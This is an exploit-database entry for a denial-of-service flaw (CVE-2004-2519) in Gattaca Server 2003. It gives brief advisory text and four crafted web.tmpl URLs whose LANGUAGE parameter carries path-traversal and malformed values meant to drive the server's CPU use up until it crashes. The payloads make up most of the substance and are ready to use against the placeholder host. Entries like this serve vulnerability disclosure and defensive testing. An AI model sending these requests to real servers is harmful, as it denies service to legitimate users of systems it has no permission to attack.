Gattaca Server 2003 - 'web.tmpl?Language' CPU Consumption (Denial of Service)

Author: dr_insane
type: dos
platform: multiple
port: 
date_added: 2004-07-15 
date_updated: 2013-01-21 
verified: 1 
codes: CVE-2004-2519;OSVDB-7924 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/10728/info

It is reported that Gattaca Server 2003 contains multiple denial of service vulnerabilities.

These vulnerabilities allow a remote attacker to crash the application, denying service to legitimate users.

Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities as well.

http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en